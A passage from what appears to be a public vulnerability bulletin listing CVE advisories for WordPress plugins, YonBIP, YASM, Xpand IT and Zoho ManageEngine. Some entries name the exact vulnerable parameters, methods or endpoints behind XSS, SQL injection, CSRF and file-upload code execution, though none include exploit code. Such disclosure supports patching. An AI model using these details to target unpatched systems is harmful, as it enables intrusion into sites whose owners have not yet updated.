wordpress  -- wordpressThe Dokan WordPress plugin before 3.6.4 allows vendors to inject arbitrary javascript in product reviews, which may allow them to run stored XSS attacks against other users like site administrators.2024-01-16not yet calculatedCVE-2022-3194
contact@wpscan.com
wordpress  -- wordpressThe Contact Form Entries WordPress plugin before 1.3.0 does not validate data when its output in a CSV file, which could lead to CSV injection.2024-01-16not yet calculatedCVE-2022-3604
contact@wpscan.com
wordpress -- wordpressThe WP Best Quiz WordPress plugin through 1.0 does not sanitize and escape some parameters, which could allow users with a role as low as Author to perform Cross-Site Scripting attacks.2024-01-16not yet calculatedCVE-2022-3739
contact@wpscan.com
wordpress -- wordpressThe Font Awesome 4 Menus WordPress plugin through 4.7.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).2024-01-16not yet calculatedCVE-2022-3829
contact@wpscan.com
wordpress  -- wordpressThe Seed Social WordPress plugin before 2.0.4 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup).2024-01-16not yet calculatedCVE-2022-3836
contact@wpscan.com
wordpress -- wordpressThe 3dprint WordPress plugin before 3.5.6.9 does not protect against CSRF attacks in the modified version of Tiny File Manager included with the plugin, allowing an attacker to craft a malicious request that will delete any number of files or directories on the target server by tricking a logged in admin into submitting a form.2024-01-16not yet calculatedCVE-2022-3899
contact@wpscan.com
wordpress -- wordpressThe Customer Reviews for WooCommerce WordPress plugin before 5.17.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.2024-01-16not yet calculatedCVE-2023-0079
contact@wpscan.com
wordpress -- wordpressThe UpQode Google Maps WordPress plugin through 1.0.5 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.2024-01-16not yet calculatedCVE-2023-0094
contact@wpscan.com
wordpress -- wordpressThe GiveWP WordPress plugin before 2.24.1 does not properly escape user input before it reaches SQL queries, which could let unauthenticated attackers perform SQL Injection attacks2024-01-16not yet calculatedCVE-2023-0224
contact@wpscan.com
contact@wpscan.com
wordpress -- wordpressThe Qubely WordPress plugin before 1.8.5 does not validate and escape some of its block options before outputting them back in a page/post where the block is embed, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.2024-01-16not yet calculatedCVE-2023-0376
contact@wpscan.com
wordpress -- wordpressThe Calculated Fields Form WordPress plugin before 1.1.151 does not sanitise and escape some of its form settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)2024-01-16not yet calculatedCVE-2023-0389
contact@wpscan.com
wordpress -- wordpressThe Print Invoice & Delivery Notes for WooCommerce WordPress plugin before 4.7.2 is vulnerable to reflected XSS by echoing a GET value in an admin note within the WooCommerce orders page. This means that this vulnerability can be exploited for users with the edit_others_shop_orders capability. WooCommerce must be installed and active. This vulnerability is caused by a urldecode() after cleanup with esc_url_raw(), allowing double encoding.2024-01-16not yet calculatedCVE-2023-0479
contact@wpscan.com
wordpress -- wordpressThe hiWeb Migration Simple WordPress plugin through 2.0.0.1 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high-privilege users such as admins.2024-01-16not yet calculatedCVE-2023-0769
contact@wpscan.com
wordpress -- wordpressThe User registration & user profile WordPress plugin through 2.0 does not have CSRF check in some places, and is missing sanitisation as well as escaping, which could allow attackers to make logged-in admin add Stored XSS payloads via a CSRF attack.2024-01-16not yet calculatedCVE-2023-0824
contact@wpscan.com
wordpress -- wordpressThe Formidable Forms WordPress plugin before 6.2 unserializes user input, which could allow anonymous users to perform PHP Object Injection when a suitable gadget is present.2024-01-16not yet calculatedCVE-2023-1405
contact@wpscan.com
wordpress -- wordpressThe Directorist WordPress plugin before 7.5.4 is vulnerable to Local File Inclusion as it does not validate the file parameter when importing CSV files.2024-01-16not yet calculatedCVE-2023-2252
contact@wpscan.com
wordpress -- wordpressThe POST SMTP Mailer WordPress plugin before 2.5.7 does not have proper CSRF checks in some AJAX actions, which could allow attackers to make logged in users with the manage_postman_smtp capability delete arbitrary logs via a CSRF attack.2024-01-16not yet calculatedCVE-2023-3178
contact@wpscan.com
 wordpress -- wordpressThe WordPress Database Administrator WordPress plugin through 1.0.3 does not properly sanitise and escape a parameter before using it in a SQL statement via an AJAX action available to unauthenticated users, leading to a SQL injection.2024-01-16not yet calculatedCVE-2023-3211
contact@wpscan.com
wordpress -- wordpressThe Lana Shortcodes WordPress plugin before 1.2.0 does not validate and escape some of its shortcode attributes before outputting them back in a page/post where the shortcode is embed, which allows users with the contributor role and above to perform Stored Cross-Site Scripting attacks.2024-01-16not yet calculatedCVE-2023-3372
contact@wpscan.com
wordpress -- wordpressThe IURNY by INDIGITALL WordPress plugin before 3.2.3 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)2024-01-16not yet calculatedCVE-2023-3647
contact@wpscan.com
wordpress -- wordpressThe My Account Page Editor WordPress plugin before 1.3.2 does not validate the profile picture to be uploaded, allowing any authenticated users, such as subscriber to upload arbitrary files to the server, leading to RCE2024-01-16not yet calculatedCVE-2023-4536
contact@wpscan.com
wordpress -- wordpressThe All in One B2B for WooCommerce WordPress plugin through 1.0.3 does not properly validate parameters when updating user details, allowing an unauthenticated attacker to update the details of any user. Updating the password of an Admin user leads to privilege escalation.2024-01-16not yet calculatedCVE-2023-4703
contact@wpscan.com
wordpress -- wordpressThe WP Discord Invite WordPress plugin before 2.5.1 does not protect some of its actions against CSRF attacks, allowing an unauthenticated attacker to perform actions on their behalf by tricking a logged in administrator to submit a crafted request.2024-01-17not yet calculatedCVE-2023-5006
contact@wpscan.com
wordpress -- wordpressThe Track The Click WordPress plugin before 0.3.12 does not properly sanitize query parameters to the stats REST endpoint before using them in a database query, allowing a logged in user with an author role or higher to perform time based blind SQLi attacks on the database.2024-01-17not yet calculatedCVE-2023-5041
contact@wpscan.com
wordpress -- wordpressThe LearnPress WordPress plugin before 4.2.5.5 does not sanitise and escape user input before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin.2024-01-16not yet calculatedCVE-2023-5558
contact@wpscan.com
wordpress -- wordpressThe Royal Elementor Addons and Templates WordPress plugin before 1.3.81 does not ensure that users accessing posts via an AJAX action (and REST endpoint, currently disabled in the plugin) have the right to do so, allowing unauthenticated users to access arbitrary draft, private and password protected posts/pages content2024-01-16not yet calculatedCVE-2023-5922
contact@wpscan.com
wordpress -- wordpressThe Ecwid Ecommerce Shopping Cart WordPress plugin before 6.12.5 does not have CSRF check in place when updating its settings, which could allow attackers to make a logged in admin change them via a CSRF attack.2024-01-16not yet calculatedCVE-2023-6292
contact@wpscan.com
wordpress -- wordpressThe ArtPlacer Widget WordPress plugin before 2.20.7 does not sanitize and escape the "id" parameter before submitting the query, leading to a SQLI exploitable by editors and above. Note: Due to the lack of CSRF check, the issue could also be exploited via a CSRF against a logged editor (or above)2024-01-16not yet calculatedCVE-2023-6373
contact@wpscan.com
wordpress -- wordpressThe FastDup WordPress plugin before 2.2 does not prevent directory listing in sensitive directories containing export files.2024-01-16not yet calculatedCVE-2023-6592
contact@wpscan.com
wordpress -- wordpressThe Ultimate Maps by Supsystic WordPress plugin before 1.2.16 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Cross-Site Scripting attacks even when unfiltered_html is disallowed2024-01-16not yet calculatedCVE-2023-6732
contact@wpscan.com
wordpress -- wordpressThe WP Customer Area WordPress plugin before 8.2.1 does not properly validate users capabilities in some of its AJAX actions, allowing malicious users to edit other users' account address.2024-01-16not yet calculatedCVE-2023-6741
contact@wpscan.com
wordpress -- wordpressThe WP Customer Area WordPress plugin before 8.2.1 does not properly validates user capabilities in some of its AJAX actions, allowing any users to retrieve other user's account address.2024-01-16not yet calculatedCVE-2023-6824
contact@wpscan.com
wordpress -- wordpressThe JSM file_get_contents() Shortcode WordPress plugin before 2.7.1 does not validate one of its shortcode's parameters before making a request to it, which could allow users with contributor role and above to perform SSRF attacks.2024-01-15not yet calculatedCVE-2023-6991
contact@wpscan.com
wordpress -- wordpressThe Community by PeepSo WordPress plugin before 6.3.1.2 does not have CSRF check when creating a user post (visible on their wall in their profile page), which could allow attackers to make logged in users perform such action via a CSRF attack2024-01-16not yet calculatedCVE-2023-7125
contact@wpscan.com
wordpress -- wordpressThe Product Enquiry for WooCommerce WordPress plugin before 3.2 does not sanitise and escape the page parameter before outputting it back in an attribute, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin2024-01-16not yet calculatedCVE-2023-7151
contact@wpscan.com
wordpress -- wordpressThe Hubbub Lite (formerly Grow Social) WordPress plugin before 1.32.0 does not sanitise and escape some of its settings, which could allow high privilege users such as admin to perform Stored Cross-Site Scripting attacks even when the unfiltered_html capability is disallowed (for example in multisite setup)2024-01-16not yet calculatedCVE-2023-7154
contact@wpscan.com
wordpress -- wordpressThe Community by PeepSo WordPress plugin before 6.3.1.2 does not sanitise and escape various parameters and generated URLs before outputting them back attributes, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin2024-01-16not yet calculatedCVE-2024-0187
contact@wpscan.com
wordpress -- wordpressThe Contact Form 7 Connector WordPress plugin before 1.2.3 does not sanitise and escape a parameter before outputting it back in the page, leading to a Reflected Cross-Site Scripting which could be used against administrators.2024-01-16not yet calculatedCVE-2024-0239
contact@wpscan.com
wordpress -- wordpressThe T1 WordPress theme through 19.0 is vulnerable to unauthenticated open redirect with which any attacker and redirect users to arbitrary websites.2024-01-16not yet calculatedCVE-2023-3771
contact@wpscan.com
wordpress -- wordpressThe Staff / Employee Business Directory for Active Directory WordPress plugin before 1.2.3 does not sanitize and escape data returned from the LDAP server before rendering it in the page, allowing users who can control their entries in the LDAP directory to inject malicious javascript which could be used against high-privilege users such as a site admin.2024-01-16not yet calculatedCVE-2023-4757
contact@wpscan.com
wordpress -- wordpressThe Newsletters WordPress plugin before 4.9.3 does not properly escape user-controlled parameters when they are appended to SQL queries and shell commands, which could enable an administrator to run arbitrary commands on the server.2024-01-16not yet calculatedCVE-2023-4797
contact@wpscan.com
wordpress -- wordpressThe WP Editor WordPress plugin before 1.2.7 did not sanitize or validate its setting fields leading to an authenticated (admin+) blind SQL injection issue via an arbitrary parameter when making a request to save the settings.2024-01-16not yet calculatedCVE-2021-24151
contact@wpscan.com
xpand_it -- write-back_managerAn arbitrary file upload vulnerability in Xpand IT Write-back Manager v2.3.1 allows attackers to execute arbitrary code via a crafted jsp file.2024-01-19not yet calculatedCVE-2023-27168
cve@mitre.org
cve@mitre.org
cve@mitre.org
cve@mitre.org
yasm -- yasmA memory leak issue discovered in YASM v.1.3.0 allows a local attacker to cause a denial of service via the new_Token function in the modules/preprocs/nasm/nasm-pp:1512.2024-01-18not yet calculatedCVE-2023-51258
cve@mitre.org
yonbip -- yonbipAn issue in yonyou YonBIP v3_23.05 allows a remote attacker to execute arbitrary code via a crafted script to the ServiceDispatcherServlet uap.framework.rc.itf.IResourceManager component.2024-01-20not yet calculatedCVE-2023-51906
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonbip -- yonbipAn arbitrary file upload vulnerability in the uap.framework.rc.itf.IResourceManager interface of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.2024-01-20not yet calculatedCVE-2023-51924
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonbip -- yonbipAn arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.2024-01-20not yet calculatedCVE-2023-51925
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonbip -- yonbipYonBIP v3_23.05 was discovered to contain an arbitrary file read vulnerability via the nc.bs.framework.comn.serv.CommonServletDispatcher component.2024-01-20not yet calculatedCVE-2023-51926
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonbip -- yonbipYonBIP v3_23.05 was discovered to contain a SQL injection vulnerability via the com.yonyou.hrcloud.attend.web.AttendScriptController.runScript() method.2024-01-20not yet calculatedCVE-2023-51927
cve@mitre.org
cve@mitre.org
cve@mitre.org
yonbip -- yonbipAn arbitrary file upload vulnerability in the nccloud.web.arcp.taskmonitor.action.ArcpUploadAction.doAction() method of YonBIP v3_23.05 allows attackers to execute arbitrary code via uploading a crafted file.2024-01-20not yet calculatedCVE-2023-51928
cve@mitre.org
cve@mitre.org
cve@mitre.org
zoho -- manageengine_servicedesk_plus_MSPZoho ManageEngine ServiceDesk Plus MSP before 14504 allows stored XSS (by a low-privileged technician) via a task's name in a time sheet.2024-01-18not yet calculatedCVE-2023-49943
cve@mitre.org
cve@mitre.org

Back to top

Please share your thoughts

We recently updated our anonymous product survey; we’d welcome your feedback.